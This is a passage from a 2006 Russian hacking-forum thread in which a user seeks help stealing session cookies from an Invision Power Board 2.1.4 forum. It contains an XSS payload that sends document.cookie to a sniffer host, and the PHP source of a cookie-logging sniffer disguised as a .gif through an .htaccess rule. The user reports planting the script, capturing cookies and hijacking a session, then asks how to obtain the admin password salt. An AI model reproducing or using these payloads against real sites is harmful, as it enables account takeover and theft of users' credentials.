HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Ipb 2.1.4. форум крутится в закрытой сетке. как правильно настроить сниф?
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 25.12.2006, 08:25
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
def_ ок понял значь правильно мыслил

А вторая часть вопроса...
лазил по форуму нашел под версию ipb 2.1.4 эту xss
<script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script>

вот немогу понять обычно сниф сам скрипт замаскирован под gif
а вданной xss получается можно даже его изменить на php и тоже полетат куки ?!
 
Ответить с цитированием

  #12  
Старый 25.12.2006, 08:26
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами: 10721066

Репутация: 4360


По умолчанию
Короче чувак. Денвер никак донастраивать не надо
 
Ответить с цитированием

  #13  
Старый 25.12.2006, 08:30
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
Цитата:
чувак смотри видео и лучьше работай не на денвере если у тебя с этим геморой а с настоящем форумом
))

Если ты на щет поставить себе етот форум и опробовать все ето то както непрет хотя c етого и надо было начинать...
 
Ответить с цитированием

  #14  
Старый 25.12.2006, 08:35
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
_Great_ ну это я понял уже что ненадо ок буду пробовать всем спасибо что не заставили долго ждать с ответами )))
 
Ответить с цитированием

  #15  
Старый 25.12.2006, 08:56
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
Хмм всеже не догоняю кое что
вот есть сниф состоит он из трех файлов
.htaccess
image.gif -картинка
snif.gif - сам скрип снифа
------------------------------------------
содержание файла .htaccess : и зачем он нужен
Код:
AddType application/x-httpd-php snif.gif
содержание файла snif.gif
Код:
<? // nerezus, 2005, GPL v2    // IF U WANNA USE .png(or .gif, .jpeg)  EXT FOR THIS FILE, TYPE AddType application/x-httpd-php .png TO YOUR .htaccess    $log="log.txt";  $file = fopen ($log, "a+");  $qu=UrlDecode(getenv('QUERY_STRING'));  $ref=UrlDecode(getenv('HTTP_REFERER'));  $ip=getenv('REMOTE_ADDR');  $now = getdate();   $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds'];  $str="[$nowstring] IP=$ip REFERER=$ref QUERY=$qu\n";  fputs ($file, $str);  fclose($file);  header('Location: image.gif');  ?>
А в этом скрипте script>http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script> скрип ссылается на сниф с расширением .php

Если я переименую gif на .php буду ли приходить куки
или можно сослаться на gif в данном xss под этот форум ?!
Последний раз редактировалось karabym; 25.12.2006 в 09:08..
 
Ответить с цитированием

  #16  
Старый 25.12.2006, 11:04
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
Поставил я значь себе этот форум ipb 2.1.4
Кидаю скрип в жалобы
<script>img = new Image(); img.src = "http:/мой_веб/сниффер.php?"+location.host+document.cookie ;</script>
Куки пришли

Но почему потом при замене кукисов в опере для обычного юзера нечего не происходит как был юзером так и остается некакой админки и духу нет ?!
Последний раз редактировалось karabym; 25.12.2006 в 12:21..
 
Ответить с цитированием

  #17  
Старый 25.12.2006, 12:29
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
А нет вру все проходит на ура

Но как до админки добраться если Админцентр потом требует повторного ввода пароля ?!
 
Ответить с цитированием

  #18  
Старый 25.12.2006, 14:41
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
Почитал тут форум оказывается не так все просто мало иметь хеш админа ещо нужна
соль

Тогда назревает вопрос какие есть sql иньекции для ipb 2.1.4 чтобы пробить соль

вот нарыл иньекцию

SELECT converge_pass_salt FROM ibf_members_converge WHERE converge_id=тут_user_id

А как ее заюзать где ее вставлять тут я профан
Последний раз редактировалось karabym; 25.12.2006 в 14:51..
 
Ответить с цитированием

  #19  
Старый 26.12.2006, 10:40
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
С нами: 10366612

Репутация: 18
По умолчанию
это не инъекция, это просто оператор выборки из MySQL, выбирается соль юзера с таким-то ид из таблицы ibf_members_converge. Чтобы это выполнить тебе нужено иметь доступ к базе данных форума.
 
Ответить с цитированием

  #20  
Старый 26.12.2006, 16:23
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
def_ спасиб пролил свет !!!
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал Дрэгги Болталка 21 22.07.2007 12:33
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Уязвимости CMS / форумов 1 26.11.2004 18:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.